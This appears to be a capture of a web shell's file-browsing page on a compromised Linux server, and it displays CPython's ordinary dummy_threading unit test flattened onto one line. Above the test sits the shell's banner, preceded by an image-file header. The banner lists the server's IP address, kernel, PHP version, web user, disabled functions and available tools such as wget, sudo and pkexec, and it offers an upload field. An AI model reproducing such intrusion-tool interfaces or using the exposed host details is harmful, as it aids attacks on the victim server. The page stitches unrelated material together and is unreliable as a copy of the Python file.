????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.148.170.88 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/Python-3.6.3/Lib/test/ |
Upload File : |
from test import support import unittest import dummy_threading as _threading import time class DummyThreadingTestCase(unittest.TestCase): class TestThread(_threading.Thread): def run(self): global running global sema global mutex # Uncomment if testing another module, such as the real 'threading' # module. #delay = random.random() * 2 delay = 0 if support.verbose: print('task', self.name, 'will run for', delay, 'sec') sema.acquire() mutex.acquire() running += 1 if support.verbose: print(running, 'tasks are running') mutex.release() time.sleep(delay) if support.verbose: print('task', self.name, 'done') mutex.acquire() running -= 1 if support.verbose: print(self.name, 'is finished.', running, 'tasks are running') mutex.release() sema.release() def setUp(self): self.numtasks = 10 global sema sema = _threading.BoundedSemaphore(value=3) global mutex mutex = _threading.RLock() global running running = 0 self.threads = [] def test_tasks(self): for i in range(self.numtasks): t = self.TestThread(name="<thread %d>"%i) self.threads.append(t) t.start() if support.verbose: print('waiting for all tasks to complete') for t in self.threads: t.join() if support.verbose: print('all tasks done') if __name__ == '__main__': unittest.main()